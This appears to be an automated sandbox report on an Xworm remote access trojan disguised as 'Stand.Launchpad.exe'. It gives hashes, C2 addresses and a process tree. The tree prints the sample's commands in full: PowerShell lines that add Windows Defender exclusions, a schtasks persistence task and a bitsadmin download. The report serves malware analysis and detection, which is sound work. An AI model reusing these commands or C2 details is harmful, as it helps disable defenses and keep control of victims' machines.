Analysis

  • max time kernel
    149s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    31-05-2024 12:50

General

  • Target

    Stand.Launchpad.exe

  • Size

    140KB

  • MD5

    bec01d16b6f3c443eb3912042c1fc7f9

  • SHA1

    436c7fabff54997f2e550754edea0ae791080c9b

  • SHA256

    2aa6b748a1ee67ba3f68a53228bbc14ed8ce1285e1dde54d310e2ca8797eb779

  • SHA512

    4101f563c479a22883a024cbd9ba9d5a46234a237471b14853a82263e96f0ac74eb101dd77a71aab98101c8cb1c9c15ed987a45b3540d300c6bb740b707b27e1

  • SSDEEP

    3072:J5XMHZjqrraIh3GGKt6cGuPN1OHXFhTVR7NetgV:H85jqrWIhGlN1sVhTwtg

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:40971

us3.localto.net:40971

Name1442-40971.portmap.host:40971

Attributes
  • Install_directory

    %Temp%

  • install_file

    Stand.exe

Signatures

  • Detect Xworm Payload 5 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe
    "C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1932
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2120
      • C:\Windows\SysWOW64\bitsadmin.exe
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\Stand.exe
        3⤵
        • Download via BitsAdmin
        PID:2684
    • C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe
      "C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2756
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1688
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.Launchpad.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2792
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1956
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2400
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"
        3⤵
        • Creates scheduled task(s)
        PID:1604
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {FBDDF939-C0E9-42DD-8638-5E66F1C17F72} S-1-5-21-268080393-3149932598-1824759070-1000:UHRQKJCP\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2832
    • C:\Users\Admin\AppData\Local\Temp\Stand.exe
      C:\Users\Admin\AppData\Local\Temp\Stand.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2236
    • C:\Users\Admin\AppData\Local\Temp\Stand.exe
      C:\Users\Admin\AppData\Local\Temp\Stand.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1824
    • C:\Users\Admin\AppData\Local\Temp\Stand.exe
      C:\Users\Admin\AppData\Local\Temp\Stand.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2028

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Downloader.hta

    Filesize

    893B

    MD5

    b0a6d4e05dc2225dd03902a3061a4041

    SHA1

    39c500eefbf78d7d51768edb6983c361213cb7b8

    SHA256

    05e5c927c6366bebab2fb341d233887f503fb692d8f6880f7d1327b64705c1ee

    SHA512

    96fb1e3046a0daddd6a17a38fcfa8ad6e00f8c4950cc7e46c8a79b24817b2f271229d15facaa510105d3c95234a9f095fdf8ff8bbb8099c47565bd955c316918

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    810bed1af6e4d383a00283a0ce7e9a3c

    SHA1

    b1616b7b8702a12c03e75d556645a67868e86451

    SHA256

    e88c722575e03b8c55e8f3b8cbdc2bb573186906b5160b786512e746ee3039fc

    SHA512

    d9e7d1be37c4301c394886ade88cebd376ec6bf528d7bc4daaf142b5980acbac4292c0b4f0523713d5091371036510d5dc6847eda0e53fecd63e78da0bf6b56c

  • C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe

    Filesize

    108KB

    MD5

    d51da3fa31165f2536dddad44974af34

    SHA1

    703a62d92fbfe23611297715ca50bb82b4ff55a1

    SHA256

    9cc68d4ab822bd8e5fd66f40b2c99bce04805505e593027aca67256ab63c6210

    SHA512

    3adfaf5e251d974a9d576c71e51e3b1c59ddee2feecf281801166cf9448a3e51e6066737c06bee20089721630f4016f16ae7297061112cb23f2fe786386e4197

  • memory/1688-28-0x000000001B670000-0x000000001B952000-memory.dmp

    Filesize

    2.9MB

  • memory/1688-29-0x0000000001D20000-0x0000000001D28000-memory.dmp

    Filesize

    32KB

  • memory/1824-57-0x0000000000E20000-0x0000000000E40000-memory.dmp

    Filesize

    128KB

  • memory/1932-1-0x0000000000A70000-0x0000000000A98000-memory.dmp

    Filesize

    160KB

  • memory/1932-0-0x000007FEF5F43000-0x000007FEF5F44000-memory.dmp

    Filesize

    4KB

  • memory/2028-59-0x00000000001C0000-0x00000000001E0000-memory.dmp

    Filesize

    128KB

  • memory/2236-54-0x0000000000350000-0x0000000000370000-memory.dmp

    Filesize

    128KB

  • memory/2756-9-0x0000000000E40000-0x0000000000E60000-memory.dmp

    Filesize

    128KB

  • memory/2792-36-0x0000000001E90000-0x0000000001E98000-memory.dmp

    Filesize

    32KB

  • memory/2792-35-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

    Filesize

    2.9MB